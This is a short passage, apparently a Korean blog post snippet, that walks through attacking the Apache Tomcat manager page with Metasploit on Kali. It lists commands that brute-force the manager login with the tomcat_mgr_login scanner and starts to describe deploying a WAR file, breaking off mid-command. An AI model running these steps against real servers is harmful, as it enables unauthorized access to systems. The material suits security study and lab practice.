tomcat1 Apache Tomcat 관리자 페이지 취약점 악용 - Metasploit 톰캣에서 [서버주소]:[서버포트]/manager/html 로 접속하게 되면 관리자 페이지 로그인 아이디와 비밀번호 입력 알림창이 뜬다. 이 상태에서 칼리에서 msfconsole을 틀어준다. >service postgresql start >msfconsole >search tomcat >use auxiliary/scanner/http/tomcat_mgr_login - mgr, 즉 매니저 로그인 취약점을 통해 아이디 비번을 알아낸다. >show options >set rhosts [서버아이피] >set rport [서버포트] >exploit 익스플로잇 후 성공한 목록의 아이디 비밀번호로 접속한다. 그 후 WAR file to deploy 탭을 활용한 취약점 해킹을 시도한다. >back >clear >sear.. 2023. 12. 28. 이전 1 다음